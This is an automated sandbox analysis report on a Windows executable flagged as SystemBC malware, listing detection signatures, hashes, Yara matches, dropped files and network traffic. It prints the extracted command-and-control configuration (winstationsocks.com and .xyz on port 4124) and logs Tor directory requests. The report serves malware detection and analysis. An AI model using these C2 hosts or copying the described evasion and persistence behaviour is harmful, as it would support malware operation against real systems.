Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
i1lq1Qpbyw.exe

Overview

General Information

Sample Name:i1lq1Qpbyw.exe
Analysis ID:802198
MD5:40753d4f4ba5863be3aaaa38cd50995a
SHA1:cb58f6a57ecd27e7380e0f38dedb621d7d161e19
SHA256:23f66ece38393f81fc1f892c9243cebb6e5412b95629cc07fa83065f5b5a3e02
Tags:exeSystemBC
Infos:

Detection

SystemBC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Antivirus / Scanner detection for submitted sample
Yara detected SystemBC
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found evasive API chain (may stop execution after checking mutex)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
May check the online IP address of the machine
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
May use the Tor software to hide its network traffic
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Creates job files (autostart)
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • i1lq1Qpbyw.exe (PID: 1716 cmdline: C:\Users\user\Desktop\i1lq1Qpbyw.exe MD5: 40753D4F4BA5863BE3AAAA38CD50995A)
  • llfujo.exe (PID: 3484 cmdline: C:\ProgramData\dtkttiw\llfujo.exe start MD5: 40753D4F4BA5863BE3AAAA38CD50995A)
  • cleanup
{"HOST1": "winstationsocks.com", "HOST2": "winstationsocks.xyz", "PORT1": "4124"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.570272612.000000000091C000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x13d0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.308267503.0000000000B11000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1680:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: i1lq1Qpbyw.exe PID: 1716JoeSecurity_SystemBCYara detected SystemBCJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: i1lq1Qpbyw.exeVirustotal: Detection: 74%Perma Link
    Source: i1lq1Qpbyw.exeAvira: detected
    Source: http://128.31.0.39/tor/status-vote/current/consensusAvira URL Cloud: Label: malware
    Source: C:\ProgramData\dtkttiw\llfujo.exeAvira: detection malicious, Label: TR/AD.Coroxy.mcdzy
    Source: i1lq1Qpbyw.exeJoe Sandbox ML: detected
    Source: C:\ProgramData\dtkttiw\llfujo.exeJoe Sandbox ML: detected
    Source: 1.2.llfujo.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
    Source: 1.2.llfujo.exe.860e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 0.2.i1lq1Qpbyw.exe.860e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 1.0.llfujo.exe.400000.0.unpackAvira: Label: TR/AD.Coroxy.mcdzy
    Source: 0.3.i1lq1Qpbyw.exe.880000.0.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 1.3.llfujo.exe.870000.0.unpackAvira: Label: TR/Patched.Ren.Gen
    Source: 0.2.i1lq1Qpbyw.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
    Source: 0.0.i1lq1Qpbyw.exe.400000.0.unpackAvira: Label: TR/AD.Coroxy.mcdzy
    Source: 1.2.llfujo.exe.400000.0.unpackMalware Configuration Extractor: SystemBC {"HOST1": "winstationsocks.com", "HOST2": "winstationsocks.xyz", "PORT1": "4124"}
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00404359 VirtualAlloc,DecryptMessage,0_2_00404359
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00404224 QueryContextAttributesA,VirtualAlloc,EncryptMessage,0_2_00404224
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00401DC1 CryptReleaseContext,0_2_00401DC1
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_004038DA CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,0_2_004038DA
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00403DE9 CryptStringToBinaryA,CryptStringToBinaryA,0_2_00403DE9
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00403BB4 CryptImportKey,CryptExportKey,CryptDestroyKey,0_2_00403BB4
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_004011B8 CryptAcquireContextA,CryptStringToBinaryA,CryptStringToBinaryA,inet_addr,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,CryptStringToBinaryA,CryptStringToBinaryA,wsprintfA,select,select,inet_addr,CryptReleaseContext,0_2_004011B8
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00861408 CryptStringToBinaryA,CryptStringToBinaryA,inet_addr,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,CryptStringToBinaryA,CryptStringToBinaryA,wsprintfA,select,select,inet_addr,CryptReleaseContext,0_2_00861408
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00862011 CryptReleaseContext,0_2_00862011
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00864039 CryptStringToBinaryA,0_2_00864039
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: 0_2_00863B2A CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,0_2_00863B2A
    Source: C:\ProgramData\dtkttiw\llfujo.exeCode function: 1_2_00861408 CryptStringToBinaryA,CryptStringToBinaryA,inet_addr,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,CryptStringToBinaryA,CryptStringToBinaryA,wsprintfA,select,select,inet_addr,CryptReleaseContext,1_2_00861408
    Source: C:\ProgramData\dtkttiw\llfujo.exeCode function: 1_2_00862011 CryptReleaseContext,1_2_00862011
    Source: C:\ProgramData\dtkttiw\llfujo.exeCode function: 1_2_00864039 CryptStringToBinaryA,1_2_00864039
    Source: C:\ProgramData\dtkttiw\llfujo.exeCode function: 1_2_00863B2A CryptStringToBinaryA,CryptStringToBinaryA,CryptDecodeObject,1_2_00863B2A
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeCode function: -----BEGIN RSA PUBLIC KEY-----0_2_00403DE9
    Source: i1lq1Qpbyw.exeBinary or memory string: -----BEGIN RSA PUBLIC KEY-----

    Compliance

    barindex
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeUnpacked PE file: 0.2.i1lq1Qpbyw.exe.400000.0.unpack
    Source: C:\ProgramData\dtkttiw\llfujo.exeUnpacked PE file: 1.2.llfujo.exe.400000.0.unpack
    Source: i1lq1Qpbyw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\i1lq1Qpbyw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49699 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.9.235.157:443 -> 192.168.2.5:49701 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.5:49737 version: TLS 1.2
    Source: Binary string: ypt\tmp_1409393509\bin\woma.pdb source: i1lq1Qpbyw.exe, 00000000.00000003.306923173.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000000.299650512.0000000000401000.00000020.00000001.01000000.00000003.sdmp
    Source: Binary string: C:\tizuzucor12\lekudoyuxe_salo.pdb source: i1lq1Qpbyw.exe, 00000000.00000003.306923173.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000000.299650512.0000000000401000.00000020.00000001.01000000.00000003.sdmp
    Source: Binary string: K\C:\tizuzucor12\lekudoyuxe_salo.pdbypt\tmp_1409393509\bin\woma.pdb source: i1lq1Qpbyw.exe, 00000000.00000003.306923173.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000000.299650512.0000000000401000.00000020.00000001.01000000.00000003.sdmp

    Networking

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 9131
    Source: unknownNetwork traffic detected: HTTP traffic on port 9131 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 9030 -> 49736
    Source: C:\ProgramData\dtkttiw\llfujo.exeDNS query: winstationsocks.xyz
    Source: C:\ProgramData\dtkttiw\llfujo.exeDNS query: winstationsocks.xyz
    Source: C:\ProgramData\dtkttiw\llfujo.exeDNS query: name: api.ipify.org
    Source: C:\ProgramData\dtkttiw\llfujo.exeDNS query: name: api.ipify.org
    Source: C:\ProgramData\dtkttiw\llfujo.exeDNS query: name: api.ipify.org
    Source: C:\ProgramData\dtkttiw\llfujo.exeDNS query: name: api.ipify.org
    Source: C:\ProgramData\dtkttiw\llfujo.exeDNS query: name: api.ipify.org
    Source: C:\ProgramData\dtkttiw\llfujo.exeDNS query: name: api.ipify.org
    Source: Malware configuration extractorURLs: winstationsocks.com
    Source: Malware configuration extractorURLs: winstationsocks.xyz
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: Joe Sandbox ViewIP Address: 131.188.40.189 131.188.40.189
    Source: Joe Sandbox ViewIP Address: 131.188.40.189 131.188.40.189
    Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 128.31.0.39User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/00c2b794f74b8759d26786ee363009c9c59088f5 HTTP/1.0Host: 62.35.195.87User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/03000eddfeb7db6a4171d09d2df028ada6b27dee HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1efbaccd28a07fd6ad7aa6f1293177d71397e918 HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1eff2704d19bf45305bbcca53e2b59a3d17a6ee3 HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1f2077bf01caf23f819d4892a89883196aba842a HTTP/1.0Host: 116.203.195.42User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/267ee437f0c28e8d0b5ddd5e0daeafc9bf0fe505 HTTP/1.0Host: 176.58.110.66User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/5756d9c403d89b79afe69d50bb0682ba318319fb HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1efbaccd28a07fd6ad7aa6f1293177d71397e918 HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1eff2704d19bf45305bbcca53e2b59a3d17a6ee3 HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/1f2077bf01caf23f819d4892a89883196aba842a HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/32361a1efdf684daedc8ca64843767a395f9eace HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/32364bef873944be481e8bcc7fae9297f5f39781 HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/server/fp/3239007ce1fb2ecdfdf2067df23b949295dc5ef6 HTTP/1.0Host: 24.53.51.144User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 131.188.40.189User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
    Source: global trafficTCP traffic: 192.168.2.5:49700 -> 128.31.0.39:9131
    Source: global trafficTCP traffic: 192.168.2.5:49702 -> 2.59.235.35:9001
    Source: global trafficTCP traffic: 192.168.2.5:49703 -> 62.35.195.87:9030
    Source: global trafficTCP traffic: 192.168.2.5:49704 -> 51.75.32.31:9001
    Source: global trafficTCP traffic: 192.168.2.5:49705 -> 140.78.100.35:8443
    Source: global trafficTCP traffic: 192.168.2.5:49706 -> 116.203.195.42:9030
    Source: global trafficTCP traffic: 192.168.2.5:49718 -> 75.194.52.84:9001
    Source: global trafficTCP traffic: 192.168.2.5:49719 -> 176.58.110.66:9030
    Source: global trafficTCP traffic: 192.168.2.5:49721 -> 185.220.101.173:11173
    Source: global trafficTCP traffic: 192.168.2.5:49722 -> 24.53.51.144:9030
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: unknownTCP traffic detected without corresponding DNS query: 128.31.0.39
    Source: llfujo.exe, 00000001.00000003.327642965.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.318587657.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.329491271.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.319529695.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.326612747.0000000002020000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.318365510.0000000001460000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.320254734.0000000001DD0000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.569369903.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.342655337.0000000001F50000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.569416802.0000000000CE0000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.326200007.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.334530849.0000000001F20000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000002.570365260.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.325628404.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.318557488.0000000001480000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.318110141.0000000001400000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.323721618.0000000001F60000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.318814888.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.569208260.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.319771879.0000000001DA0000.00000004.00001000.00020000.00000000.sdmp, llfujo.exe, 00000001.00000003.569158116.0000000000CB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://386bsd.net
    Source: i1lq1Qpbyw.exe, i1lq1Qpbyw.exe, 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, i1lq1Qpbyw.exe, 00000000.00000003.305913377.0000000000880000.00000004.00001000.00020000.00000000.sdmp, i1lq1Qpbyw.exe, 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, llfujo.exe, llfujo.exe, 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
